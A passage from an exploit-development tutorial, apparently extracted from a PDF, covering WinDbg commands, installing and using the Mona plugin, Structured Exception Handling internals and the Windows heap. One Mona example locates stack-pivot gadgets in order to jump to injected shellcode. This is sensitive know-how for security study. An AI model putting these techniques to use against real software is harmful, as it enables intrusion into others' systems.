77c6cb
70
: memory address
 

 
0002 (0002)
: the number of passes remaining before the activation, followed by the total number of 
passes to wait for the activation (i.e. the value specified when the breakpoint was created).
 

 
0:****
: the associated process and thread. T
he asterisks mean that the breakpoint is not thread
-
specific.
 

 
ntdll!CsrSetPriorityClass+0x40
: the 
module
, 
function
 and 
offset
 where the breakpoint is located.
 
To disable a breakpoint type
 
bd <breakpoint id>
 
To delete a breakpoint use
 
bc <breakpoint ID>
 
To 
delete all the breakpoints type
 
bc *
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 12 
-
 
Breakpoint Commands
 
If you want to execute a certain command automatically every time a breakpoint is triggered, you can specify 
the command like this:
 
bp 40a410 ".echo 
\
"Here are the registers:
\
n
\
"; r"
 
Here’s another e
xample:
 
bp jscript9+c2c47 ".printf 
\
"new Array Data: addr = 0x%p
\
\
n
\
",eax;g"
 
Stepping
 
There are at least 3 types of 
stepping
:
 
1
.
 
step
-
in
 / 
trace
 (command: 
t
)
 
This command breaks after every single instruction. If you are on a 
call
 or 
int
, the command breaks o
n the 
first instruction of the called function or 
int handler
, respectively.
 
2
.
 
step
-
over
 (command: 
p
)
 
This command breaks after every single instruction without following 
calls
 or 
ints
, i.e. if you are on a 
call
 
or 
int
, the command breaks on the instruction 
right after the 
call
 or 
int
.
 
3
.
 
step
-
out
 (command: 
gu
)
 
This command (
go up
) resume execution and breaks right after the next 
ret
 instruction. It’s used to exit 
functions.
 
There two other commands for exiting functions:
 
o
 
tt
 (
trace to next return
): it’s equivale
nt to using the command ‘
t
‘ repeatedly and stopping on the 
first 
ret
 encountered.
 
o
 
pt
 (
step to next return
): it’s equivalent to using the command ‘
p
‘ repeatedly and stopping on the 
first 
ret
 encountered.
 
Note that 
tt
 goes inside functions so, if you want to
 get to the 
ret
 instruction of the current function, use 
pt
 instead.
 
The difference between 
pt
 and 
gu
 is that 
pt
 breaks on the 
ret
 instruction, whereas 
gu
 breaks on the 
instruction right after.
 
Here are the variants of ‘
p
‘ and ‘
t
‘:
 

 
pa
/
ta <address>
: step/tr
ace to address
 

 
pc
/
tc
: step/trace to next 
call
/
int
 instruction
 

 
pt
/
tt
: step/trace to next 
ret
 (discussed above at point 3)
 

 
pct
/
tct
: step/trace to next 
call
/
int
 or 
ret
 

 
ph
/
th
: step/trace to next 
branching instruction
 
Displaying Memory
 
To display the contents o
f memory, you can use ‘
d
‘ or one of its variants:
 

 
db
: display 
bytes
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 13 
-
 

 
dw
: display 
words
 (2 bytes)
 

 
dd
: display 
dwords
 (4 bytes)
 

 
dq
: display 
qwords
 (8 bytes)
 

 
dyb
: display 
bits
 

 
da
: display null
-
terminated 
ASCII
 strings
 

 
du
: display null
-
terminated 
Unicode
 string
s
 
Type 
.hh d
 for seeing other variants.
 
The command ‘
d
‘ displays data in the same format as the most recent 
d*
 command (or 
db
 if there isn’t one).
 
The (simplified) format of these commands is
 
d* [range]
 
Here, the asterisk is used to represent all the varia
tions we listed above and the square brackets indicate 
that 
range
 is optional. If 
range
 is missing, 
d*
 will display the portion of memory right after the portion 
displayed by the most recent 
d*
 command.
 
Ranges can be specified many ways:
 
1
.
 
<start address> <e
nd address>
 
For instance,
 
db 77cac000 77cac0ff
 
2
.
 
<start address> L<number of elements>
 
For instance,
 
dd 77cac000 L10
 
displays 10 
dwords
 starting with the one at 
77cac000
.
 
Note:
 for ranges larger than 
256 MB
, we must use 
L?
 instead of 
L
 to specify the number 
of elements.
 
3
.
 
<start address>
 
When only the starting point is specified, WinDbg will display 128 bytes.
 
Editing Memory
 
You can edit memory by using
 
e[d|w|b] <address> [<new value 1> ... <new value N>]
 
where 
[d|w|b]
 is optional and specifies the size of the 
elements to edit (
d
 = 
dword
, 
w
 = 
word
, 
b
 = 
byte
).
 
If the new values are omitted, WinDbg will ask you to enter them interactively.
 
Here’s an example:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 14 
-
 
ed eip cc cc
 
This overwrites the first two dwords at the address in 
eip
 with the value 
0xCC
.
 
Searching Memo
ry
 
To search memory use the ‘
s
‘ command. Its format is:
 
s [
-
d|
-
w|
-
b|
-
a|
-
u] <start address> L?<number of elements> <search values>
 
where 
d
, 
w
, 
b
,
 
a
 and 
u
 means 
dword
, 
word
, 
byte
, 
ascii
 and 
unicode
.
 
<search values>
 is the sequence of values to search.
 
For in
stance,
 
s 
-
d eip L?1000 cc cc
 
searches for the two consecutive dwords 
0xcc 0xcc
 in the memory interval 
[eip, eip + 1000*4 
–
 1]
.
 
Pointers
 
Sometimes you need to dereference a pointer. The operator to do this is 
poi
:
 
dd poi(ebp+4)
 
In this command, 
poi(ebp+4)
 
evaluates to the 
dword
 (or 
qword
, if in 64
-
bit mode) at the address 
ebp+4
.
 
Miscellaneous Commands
 
To display the registers, type
 
r
 
To display specific registers, say 
eax
 and 
edx
, type
 
r eax, edx
 
To print the first 3 instructions pointed to by 
EIP
, use
 
u EI
P L3
 
where ‘
u
‘ is short for 
unassemble
 and ‘
L
‘ lets you specify the number of lines to display.
 
To display the 
call stack
 use
 
k
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 15 
-
 
Dumping Structures
 
Here are the commands used to display structures:
 
 
!teb
 
Displays the 
TEB
 (
T
hread 
E
nvironment 
B
lock).
 
$teb
 
Ad
dress of the 
TEB
.
 
!peb
 
Displays the 
PEB
 (
P
rocess 
E
nvironment 
B
lock).
 
$peb
 
Address of the 
PEB
.
 
!exchain
 
Displays the current 
exception handler chain
.
 
!vadump
 
Displays the list of 
memory pages
 and info.
 
!lmi <module name>
 
Displays information for the sp
ecified 
module
.
 
!slist <address> 
[ <symbol> [<offset>] ]
 
Displays a 
singly
-
linked list
, where:
 

 
<address>
 is the address of the pointer to the first node of the list
 

 
<symbol>
 is the name of the structure of the nodes
 

 
<offset>
 is the offset of the field “ne
xt” within the node
 
dt <struct name>
 
Displays the structure 
<struct name>
.
 
dt <struct name> <field>
 
Displays the field 
<field>
 of the structure 
<struct name>
.
 
dt <struct name> 
<address>
 
Displays the data at 
<address>
 as a structure of type 
<struct name>
 (you need 
symbols for 
<struct name>
).
 
dg <first selector> [<last 
selector>]
 
Displays the 
segment descriptor
 for the specified 
selectors
.
 
Suggested SETUP
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 16 
-
 
 
Save the workspace (
File
→
Save Workspace
) after setting up the windows.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 17 
-
 
 
Mona 2
 
 
Mona 2
 is a ve
ry useful extension developed by the 
Corelan Team
. Originally written for 
Immunity Debugger
, 
it now works in 
WinDbg
 as well.
 
Installation in WinDbg
 
You’ll need to install everything for both WinDbg 
x86
 and WinDbg 
x64
:
 
1
.
 
Install 
Python 2.7
 (download it from 
here
)
 
Install the x86 and x64 versions in different directories, e.g. 
c:
\
python27(32)
 and 
c:
\
python27
.
 
2
.
 
Download the right zip package from 
here
, and extract and run 
vcredist_x86.exe
 and 
vcredist_x64.exe
.
 
3
.
 
Download the two exes (x86 and x64) from 
here
 and execute them.
 
4
.
 
Download 
windbglib.py
 and 
mona.py
 from 
here
 and put them in the same
 directories as windbg.exe 
(32
-
bit and 64
-
bit versions).
 
5
.
 
Configure the 
symbol search path
 as follows:
 
1
.
 
click on 
File
→
Symbol File Path
 
2
.
 
enter
 
SRV*C:
\
windbgsymbols*http://msdl.microsoft.com/download/symbols
 
3
.
 
save the workspace (
File
→
Save Workspace
).
 
Running mona.py under WinDbg
 
Running mona.py in WinDbg is simple:
 
1
.
 
Load the 
pykd extension
 with the command
 
.load pykd.pyd
 
2
.
 
To r
un mona use
 
!py mona
 
To update mona enter
 
!py mona update
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 18 
-
 
Configuration
 
Working directory
 
Many functions of mona dump data to files created in the mona’s 
working directory
. We can specify a 
working directory which depends on the 
process name
 and 
id
 by usin
g the format specifiers 
%p
 (process 
name) and 
%i
 (process id). For instance, type
 
!py mona config 
-
set workingfolder "C:
\
mona_files
\
%p_%i"
 
Exclude modules
 
You can exclude specific modules from search operations:
 
!mona config 
-
set excluded_modules "module1.
dll,module2.dll"
 
!mona config 
-
add excluded_modules "module3.dll,module4.dll"
 
Author
 
You can also set the author:
 
!mona config 
-
set author Kiuhnm
 
This information will be used when producing 
metasploit
 compatible output.
 
Important
 
If there’s something wron
g with WinDbg and mona, try running WinDbg as an administrator.
 
Mona’s Manual
 
You can find more information about Mona 
here
.
 
Example
 
This example is taken from Mona’s Manual.
 
L
et’s say that we control the value of 
ECX
 in the following code:
 
Example
 
Assembly (x86)
 
 
MOV
    
EAX
,
 
[
ECX
]
 
CALL
   
[
EAX
+
58h
]
 
 
We want to use that piece of code to jmp to our 
shellcode
 (i.e. the code we injected into the process) whose 
address is at 
ESP
+4, s
o we need the call above to call something like “
ADD ESP, 4 | RET
“.
 
There is a lot of indirection in the piece of code above:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 19 
-
 
1
.
 
(
ECX
 = 
p1
) 
→ 
p2
 
2
.
 
p2
+58h 
→ 
p3
 
→ “ADD ESP,4 | RET”
 
First we need to find 
p3
:
 
!py mona config 
-
set workingfolder c:
\
logs
 
!py mona stackpivot 
-
distance 4,4
 
The function 
stackpivot
 finds pointers to code equivalent to “
ADD ESP, X | RET
” where 
X
 is between 
min
 
and 
max
, whic
h are specified through the option “
-
distance min,max
“.
 
The pointers/addresses found are written to 
c:
\
logs
\
stackpivot.txt
.
 
Now that we have our 
p3
 (many 
p3
s!) we need to find 
p1
:
 
!py mona find 
-
type file 
-
s "c:
\
logs
\
stackpivot.txt" 
-
x * 
-
offset 58 
-
level 
2 
-
offsetlevel 2
 
Let’s see what all those options mean:
 

 
“
-
x *
” means “accept addresses in 
pages
 with any 
access level
” (as another example, with “
-
x X
” we 
want only addresses in 
executable pages
).
 

 
“
-
level 2
” specifies the 
level of indirection
, that is, it 
tells mona to find “a pointer (
p1
) to a pointer (
p2
) 
to a pointer (
p3
)”.
 

 
The first two options (
-
type
 and 
-
s
) specifies that 
p3
 must be a pointer listed in the file 
“
c:
\
logs
\
stackpivot.txt
“.
 

 
“
-
offsetlevel 2
” and “
-
offset 58
” tell mona that the second point
er (
p2
) must point to the third pointer 
(
p3
) once incremented by 58h.
 
Don’t worry too much if this example isn’t perfectly clear to you. This is just an example to show you what 
Mona can do. I admit that the syntax of this command is not very intuitive, th
ough.
 
Example
 
The command 
findwild
 allows you to find 
chains
 of instructions with a particular form.
 
Consider this example:
 
!mona findwild 
-
s "push r32 # * # pop eax # inc eax # * # retn"
 
The option “
-
s
” specifies the 
shape
 of the chain:
 

 
instructions are s
eparated with ‘
#
‘
 

 
r32
 is any 32
-
bit register
 

 
*
 is any sequence of instructions
 
The optional arguments supported are:
 

 
-
depth <nr>
: maximum length of the chain
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 20 
-
 

 
-
b <address>
: base address for the search
 

 
-
t <address>
: top address for the search
 

 
-
all
: returns a
lso chains which contain “bad” instructions, i.e. instructions that might break the chain 
(jumps, calls, etc...)
 
ROP Chains
 
Mona can find 
ROP gadgets
 and build 
ROP chains
, but I won’t talk about this here because you’re not 
supposed to know what a ROP chain 
is or what 
ROP
 is. As I said, don’t worry if this article doesn’t make 
perfect sense to you. Go on to the next article and take it easy!
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 21 
-
 
Structured Exception 
Handling (SEH)
 
 
The 
exception handlers
 are organized in a 
singly
-
linked list
 associated with each thread. As a rule, the 
nodes of that list are allocated on the
 stack.
 
The head of the list is pointed to by a pointer located at the beginning of the 
TEB
 (
T
hread 
E
nvironment 
B
lock), so when the code wants to add a new exception handler, a new node is added to the head of the list 
and the pointer in the 
TEB
 is changed
 to point to the new node.
 
Each node is of type
 
_EXCEPTION_REGISTRATION_RECORD
 and stores the address of the handler and 
a pointer to the next node of the list. Oddly enough, the “
next pointer
” of the last node of the list is not null 
but equal to 
0xffffff
ff
. Here’s the exact definition:
 
0:000> dt _EXCEPTION_REGISTRATION_RECORD
 
ntdll!_EXCEPTION_REGISTRATION_RECORD
 
 
 +0x000 Next
 
 
 : Ptr32 _EXCEPTION_REGISTRATION_RECORD
 
 
 +0x004 Handler
 
 
 : Ptr32
 
 
 _EXCEPTION_DISPOSITION
 
The 
TEB
 can also 
be accessed through the 
selector
 
fs
, starting from 
fs:[0]
, so it’s common to see code like 
the following:
 
Assembly (x86)
 
 
mov
    
eax
,
 
dword
 
ptr
 
fs
:[
00000000h
]
      
; retrieve the head
 
push
   
eax
                                
; save the old head
 
lea
    
eax
,
 
[
ebp
-
10h
]
 
mov
    
dword
 
ptr
 
fs
:[
00000000h
],
 
eax
      
; set the new head
 
.
 
.
 
.
 
mov
    
ecx
,
 
dword
 
ptr
 
[
ebp
-
10h
]
           
; get the old head (NEXT field of the current head)
 
mov
    
dword
 
ptr
 
fs
:[
00000000h
],
 
ecx
      
; restore the old head
 
 
Compilers usually
 register a single 
global handler
 that knows which area of the program is being executed 
(relying on a global variable) and behaves accordingly when it’s called.
 
Since each thread has a different 
TEB
, the operating system makes sure that the segment select
ed by 
fs
 
refers always to the right 
TEB
 (i.e. the one of the current thread). To get the address of the 
TEB
, read 
fs:[18h]
 which corresponds to the field 
Self
 of the 
TEB
.
 
Let’s display the 
TEB
:
 
0:000> !teb
 
TEB at 7efdd000
 
 
 ExceptionList:
 
 
 003ef804
          <
-----------------------
 
 
 StackBase:
 
 
 003f0000
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 22 
-
 
 
 StackLimit:
 
 
 003ed000
 
 
 SubSystemTib:
 
 
 00000000
 
 
 FiberData:
 
 
 00001e00
 
 
 ArbitraryUserPointer: 00000000
 
 
 Self:
 
 
 7efdd000
 
 
 Environ
mentPointer:
 
 
 00000000
 
 
 ClientId:
 
 
 00001644 . 00000914
 
 
 RpcHandle:
 
 
 00000000
 
 
 Tls Storage:
 
 
 7efdd02c
 
 
 PEB Address:
 
 
 7efde000
 
 
 LastErrorValue:
 
 
 2
 
 
 LastStatusValue:
 
 
 c0000034
 
 
 Count Owned Lo
cks:
 
 
 0
 
 
 HardErrorMode:
 
 
 0
 
Now let’s verify that 
fs
 refers to the 
TEB
:
 
0:000> dg fs
 
 
 P Si Gr Pr Lo
 
Sel
 
 
 Base
 
 
 Limit
 
 
 Type
 
 
 l ze an es ng Flags
 
----
 
--------
 
--------
 
----------
 
-
 
--
 
--
 
--
 
--
 
--------
 
00
53 7efdd000 00000fff Data RW Ac 3 Bg By P
 
 Nl 000004f3
 
As we said above, 
fs:18h
 contains the address of the 
TEB
:
 
0:000> ? poi(fs:[18])
 
Evaluate expression: 2130563072 = 7efdd000
 
Remember that 
poi
 dereferences a pointer and ‘
?
‘ is used to evaluate an expres
sion.
 
Let’s see what’s the name of the structure pointed to by 
ExceptionList
 above:
 
0:000> dt nt!_NT_TIB ExceptionList
 
ntdll!_NT_TIB
 
 
 +0x000 ExceptionList : Ptr32 _EXCEPTION_REGISTRATION_RECORD
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 23 
-
 
This means that each node is an instance of 
_EXCEPTION_REGIS
TRATION_RECORD
, as we already said.
 
To display the entire list, use 
!slist
:
 
0:000> !slist $teb _EXCEPTION_REGISTRATION_RECORD
 
SLIST HEADER:
 
 
 +0x000 Alignment
 
 
 : 3f0000003ef804
 
 
 +0x000 Next
 
 
 : 3ef804
 
 
 +0x004 Depth
 
 
 : 0
 
 
 +0x006 Sequence
 
 
 : 3f
 
 
SLIST CONTENTS:
 
003ef804
 
 
 +0x000 Next
 
 
 : 0x003ef850 _EXCEPTION_REGISTRATION_RECORD
 
 
 +0x004 Handler
 
 
 : 0x6d5da0d5
 
 
 _EXCEPTION_DISPOSITION
 
 MSVCR120!_except_handler4+0
 
003ef850
 
 
 +0x000 Next
 
 
 : 0x003ef89c _EXCEPTION_REGISTRATION_RECORD
 
 
 +0x004 Handler
 
 
 : 0x00271709
 
 
 _EXCEPTION_DISPOSITION
 
 +0
 
003ef89c
 
 
 +0x000 Next
 
 
 : 0xffffffff _EXCEPTION_REGISTRATION_RECORD
 
 
 +0x004 Handler
 
 
 : 0x77e21985
 
 
 _EXCEPTIO
N_DISPOSITION
 
 ntdll!_except_handler4+0
 
ffffffff
 
 
 +0x000 Next
 
 
 : ???? 
 
 
 +0x004 Handler
 
 
 : ???? 
 
Can't read memory at ffffffff, error 0
 
Remember that 
$teb
 is the address of the 
TEB
.
 
A simpler way to display the exception handler chain
 is to use
 
0:000> !exchain
 
003ef804: MSVCR120!_except_handler4+0 (6d5da0d5)
 
 
 CRT scope
 
 0, func:
 
 
 MSVCR120!doexit+116 (6d613b3b)
 
003ef850: exploitme3+1709 (00271709)
 
003ef89c: ntdll!_except_handler4+0 (77e21985)
 
 
CRT scope
 
 0, filter: ntdll!__RtlUserThr
eadStart+2e (77e21c78)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 24 
-
 
 
func:
 
 
 ntdll!__RtlUserThreadStart+63 (77e238cb)
 
We can also examine the exception handler chain manually:
 
0:000> dt 003ef804 _EXCEPTION_REGISTRATION_RECORD
 
MSVCR120!_EXCEPTION_REGISTRATION_RECORD
 
 
 +0x000 Next
 
 
 : 0x003ef850 _EXCEPTION_REGISTRATION_RECORD
 
 
 +0x004 Handler
 
 
 : 0x6d5da0d5
 
 
 _EXCEPTION_DISPOSITION
 
 MSVCR120!_except_handler4+0
 
0:000> dt 0x003ef850 _EXCEPTION_REGISTRATION_RECORD
 
MSVCR120!_EXCEPTION_REGISTRATION_RECORD
 
 
 +0x000 Next
 
 
 : 0x003ef89c _EXCEPTION_REGISTRATION_RECORD
 
 
 +0x004 Handler
 
 
 : 0x00271709
 
 
 _EXCEPTION_DISPOSITION
 
 +0
 
0:000> dt 0x003ef89c _EXCEPTION_REGISTRATION_RECORD
 
MSVCR120!_EXCEPTION_REGISTRATION_RECORD
 
 
 +0x000 Next
 
 
 : 0xffffffff
 _EXCEPTION_REGISTRATION_RECORD
 
 
 +0x004 Handler
 
 
 : 0x77e21985
 
 
 _EXCEPTION_DISPOSITION
 
 ntdll!_except_handler4+0
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 25 
-
 
Heap
 
 
When a process starts, the 
heap manager
 creates a new 
heap
 called the 
default process heap
. 
C/C++
 
applications also creates the so
-
called 
CRT heap
 (used by 
new
/
delete
, 
malloc
/
free
 and their variants). It is 
also possible to create other heaps via
 the 
HeapCreate
 API function. The 
Windows heap manager
 can be 
broken down into two components: the 
Front End Allocator
 and the 
Back End Allocator
.
 
Front End Allocator
 
The 
front end allocator
 is an abstract optimization layer for the 
back end allocator
. The
re are different types 
of 
front end allocators
 which are optimized for different use cases. The 
front end allocators
 are:
 
1
.
 
Look aside list
 (
LAL
) 
front end allocator
 
2
.
 
Low fragmentation
 (
LF
) 
front end allocator
 
The 
LAL
 is a table of 128 
singly
-
linked lists
. Ea
ch list contains 
free blocks
 of a specific size, starting at 16 
bytes. The size of each block includes 8 bytes of 
metadata
 used to manage the block. The formula for 
determining the index into the table given the size is 
index = ceil((size + 8)/8) 
–
 1
 where
 the “
+8
” accounts 
for the metadata. Note that 
index
 is always positive.
 
Starting with 
Windows Vista
, the 
LAL front end allocator
 isn’t present anymore and the 
LFH front end 
allocator
 is used instead. The 
LFH front end allocator
 is very complex, but the ma
in idea is that it tries to 
reduce the heap fragmentation by allocating the smallest block of memory that is large enough to contain 
data of the requested size.
 
Back End Allocator
 
If the 
front end allocator
 is unable to satisfy an allocation request, the r
equest is sent to the 
back end 
allocator
.
 
In 
Windows XP
, the 
back end allocator
 uses a table similar to that used in the 
front end allocator
. The list at 
index 0 of the table contains free blocks whose size is greater than 1016 bytes and less than or equal
 to the 
virtual allocation limit
 (
0x7FFF0
 bytes). The blocks in this list are sorted by size in ascending order. The 
index 1 is unused and, in general, index 
x
 contains free blocks of size 
8x
. When a block of a given size is 
needed but isn’t available, the
 
back end allocator
 tries to split bigger blocks into blocks of the needed size. 
The opposite process, called 
heap coalescing
 is also possible: when a block is freed, the heap manager 
checks the two adjacent blocks and if one or both of them are free, the 
free blocks may be coalesced into a 
single block. This reduces 
heap fragmentation
. For allocations of size greater than 
0x7FFF0
 bytes the heap 
manager sends an explicit allocation request to the 
virtual memory manager
 and keeps the allocated blocks 
on a li
st called the 
virtual allocation list
.
 
In 
Windows 7
, there aren’t any longer dedicated 
free lists
 for specific sizes. 
Windows 7
 uses a single 
free list
 
which holds blocks of all sizes sorted by size in ascending order, and another list of nodes (of type 
Li
stHint
) 
which point to nodes in the free list and are used to find the nodes of the appropriate size to satisfy the 
allocation request.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 26 
-
 
Heap segments
 
All the memory used by the 
heap manager
 is requested from the 
Windows virtual memory manager
. The 
heap man
ager
 requests big chunks of virtual memory called 
segments
. Those 
segments
 are then used by 
the 
heap manager
 to allocate all the blocks and the internal bookkeeping structures. When a new 
segment
 
is created, its memory is just reserved and only a small por
tion of it is committed. When more memory is 
needed, another portion is committed. Finally, when there isn’t enough uncommitted space in the current 
segment
, a new 
segment
 is created which is twice as big as the previous 
segment
. If this isn’t possible 
bec
ause there isn’t enough memory, a smaller 
segment
 is created. If the available space is insufficient even 
for the smallest possible 
segment
, an error is returned.
 
Analyzing the Heap
 
The list of heaps is contained in the 
PEB
 (
P
rocess 
E
nvironment 
B
lock) at o
ffset 0x90:
 
0:001> dt _PEB @$peb
 
 ntdll!_PEB
 
 +0x000 InheritedAddressSpace : 0 ''
 
 +0x001 ReadImageFileExecOptions : 0 ''
 
 +0x002 BeingDebugged
 
 
 : 0x1 ''
 
 
+0x003 BitField
 
 
 : 0x8 ''
 
 +0x003 ImageUsesLargePages : 0y0
 
 
+0x003 IsProtectedProcess : 0y0
 
 +0x003 IsLegacyProcess
 
 : 0y0
 
 +0x003 IsImageDynamicallyRelocated : 0y1
 
 +0x003 SkipPatchingUser32Forwarders : 0y0
 
 +0x003 SpareBits
 
 
 : 0y000
 
 +0x004 Mutant
 
 
 : 0xffffffff Void
 
 +0x008 ImageBaseAddress : 0x004a0000 Void
 
 +0x00c Ldr
 
 
 : 0x77eb0200 _PEB_LDR_DATA
 
 +0x010 ProcessParameters : 0x002d13c8 _RTL_USER_PROCESS_PARAMETERS
 
 +0x014 SubSystemData
 
 
 : (null)
 
 +0x018 ProcessHeap
 
 
 : 0x002d0000 Void
 
 +0x01c FastPebLock
 
 
 : 0x77eb2100 _RTL_CRITICAL_SECTION
 
 +0x020 AtlThunkSLi
stPtr : (null)
 
 +0x024 IFEOKey
 
 
 : (null)
 
 +0x028 CrossProcessFlags : 0
 
 +0x028 ProcessInJob
 
 
 : 0y0
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 27 
-
 
 +0x028 ProcessInitializing : 0y0
 
 +0x028 ProcessUsingVEH
 
 : 0y0
 
 +0x028 ProcessUsingVCH
 
 : 0y0
 
 
+0x028 ProcessUsingFTH
 
 : 0y0
 
 +0x028 ReservedBit
s0
 
 
 : 0y000000000000000000000000000 (0)
 
 +0x02c KernelCallbackTable : 0x760eb9f0 Void
 
 +0x02c UserSharedInfoPtr : 0x760eb9f0 Void
 
 +0x030 SystemReserved
 
 
 : [1] 0
 
 +0x034 AtlThunkSListPtr32 : 0
 
 +0x038 ApiSetMap
 
 
 : 0x00040000 Void
 
 +0x03c TlsExpans
ionCounter : 0
 
 +0x040 TlsBitmap
 
 
 : 0x77eb4250 Void
 
 +0x044 TlsBitmapBits
 
 
 : [2] 0x1fffffff
 
 
+0x04c ReadOnlySharedMemoryBase : 0x7efe0000 Void
 
 +0x050 HotpatchInformation : (null)
 
 +0x054 ReadOnlyStaticServerData : 0x7efe0a90
 
 
-
> (null)
 
 +0x058 Ans
iCodePageData : 0x7efb0000 Void
 
 +0x05c OemCodePageData
 
 : 0x7efc0228 Void
 
 +0x060 UnicodeCaseTableData : 0x7efd0650 Void
 
 +0x064 NumberOfProcessors : 8
 
 +0x068 NtGlobalFlag
 
 
 : 0x70
 
 +0x070 CriticalSectionTimeout : _LARGE_INTEGER 0xffffe86d`079b8000
 
 +0
x078 HeapSegmentReserve : 0x100000
 
 +0x07c HeapSegmentCommit : 0x2000
 
 +0x080 HeapDeCommitTotalFreeThreshold : 0x10000
 
 +0x084 HeapDeCommitFreeBlockThreshold : 0x1000
 
 +0x088 NumberOfHeaps
 
 
 : 7
 
 +0x08c MaximumNumberOfHeaps : 0x10
 
 +0x090 ProcessHeaps
 
 
 : 0x77eb4760
 
 
-
> 0x002d0000 Void
 
 +0x094 GdiSharedHandleTable : (null)
 
 +0x098 ProcessStarterHelper : (null)
 
 +0x09c GdiDCAttributeList : 0
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 28 
-
 
 +0x0a0 LoaderLock
 
 
 : 0x77eb20c0 _RTL_CRITICAL_SECTION
 
 +0x0a4 OSMajorVersion
 
 
 : 6
 
 +0x0a8 OSMinorVersion
 
 
 :
 1
 
 +0x0ac OSBuildNumber
 
 
 : 0x1db1
 
 +0x0ae OSCSDVersion
 
 
 : 0x100
 
 +0x0b0 OSPlatformId
 
 
 : 2
 
 +0x0b4 ImageSubsystem
 
 
 : 2
 
 +0x0b8 ImageSubsystemMajorVersion : 6
 
 +0x0bc ImageSubsystemMinorVersion : 1
 
 +0x0c0 ActiveProcessAffinityMask : 0xff
 
 +0x0c4 G
diHandleBuffer
 
 : [34] 0
 
 +0x14c PostProcessInitRoutine : (null)
 
 +0x150 TlsExpansionBitmap : 0x77eb4248 Void
 
 +0x154 TlsExpansionBitmapBits : [32] 1
 
 +0x1d4 SessionId
 
 
 : 1
 
 +0x1d8 AppCompatFlags
 
 
 : _ULARGE_INTEGER 0x0
 
 +0x1e0 AppCompatFlagsUser : _
ULARGE_INTEGER 0x0
 
 
+0x1e8 pShimData
 
 
 : (null)
 
 +0x1ec AppCompatInfo
 
 
 : (null)
 
 +0x1f0 CSDVersion
 
 
 : _UNICODE_STRING "Service Pack 1"
 
 +0x1f8 ActivationContextData : 0x00060000 _ACTIVATION_CONTEXT_DATA
 
 +0x1fc ProcessAssemblyStorageMap : 0x002
d4988 _ASSEMBLY_STORAGE_MAP
 
 +0x200 SystemDefaultActivationContextData : 0x00050000 _ACTIVATION_CONTEXT_DATA
 
 
+0x204 SystemAssemblyStorageMap : (null)
 
 +0x208 MinimumStackCommit : 0
 
 
+0x20c FlsCallback
 
 
 : 0x002d5cb8 _FLS_CALLBACK_INFO
 
 +0x210 FlsListHe
ad
 
 
 : _LIST_ENTRY [ 0x2d5a98 
-
 0x2d5a98 ]
 
 +0x218 FlsBitmap
 
 
 : 0x77eb4240 Void
 
 +0x21c FlsBitmapBits
 
 
 : [4] 0x1f
 
 
+0x22c FlsHighIndex
 
 
 : 4
 
 +0x230 WerRegistrationData : (null)
 
 
+0x234 WerShipAssertPtr : (null)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 29 
-
 
 +0x238 pContextData
 
 
 : 0x00
070000 Void
 
 +0x23c pImageHeaderHash : (null)
 
 +0x240 TracingFlags
 
 
 : 0
 
 +0x240 HeapTracingEnabled : 0y0
 
 +0x240 CritSecTracingEnabled : 0y0
 
 +0x240 SpareTracingBits : 0y000000000000000000000000000000 (0)
 
The interesting part is this:
 
+0x088 NumberOfHea
ps
 
 
 : 7
 
.
 
+0x090 ProcessHeaps
 
 
 : 0x77eb4760
 
 
-
> 0x002d0000 Void
 
ProcessHeaps
 points to an array of pointers to 
HEAP
 structures (one pointer per heap).
 
Let’s see the array:
 
0:001> dd 0x77eb4760
 
 77eb4760
 
 002d0000 005b0000 01e30000 01f90000
 
 
77eb4770
 
 
02160000 02650000 02860000 00000000
 
 77eb4780
 
 00000000 00000000 00000000 00000000
 
 77eb4790
 
 00000000 00000000 00000000 00000000
 
 77eb47a0
 
 00000000 00000000 00000000 00000000
 
 77eb47b0
 
 00000000 00000000 00000000 00000000
 
 
77eb47c0
 
 00000000 00000000 000
00000 00000000
 
 77eb47d0
 
 00000000 00000000 00000000 00000000
 
We can display the 
HEAP
 structure of the first heap like this:
 
0:001> dt _HEAP 2d0000
 
 ntdll!_HEAP
 
 +0x000 Entry
 
 
 : _HEAP_ENTRY
 
 +0x008 SegmentSignature : 0xffeeffee
 
 +0x00c SegmentFla
gs
 
 
 : 0
 
 +0x010 SegmentListEntry : _LIST_ENTRY [ 0x2d00a8 
-
 0x2d00a8 ]
 
 +0x018 Heap
 
 
 : 0x002d0000 _HEAP
 
 +0x01c BaseAddress
 
 
 : 0x002d0000 Void
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 30 
-
 
 +0x020 NumberOfPages
 
 
 : 0x100
 
 +0x024 FirstEntry
 
 
 : 0x002d0588 _HEAP_ENTRY
 
 +0x028 Last
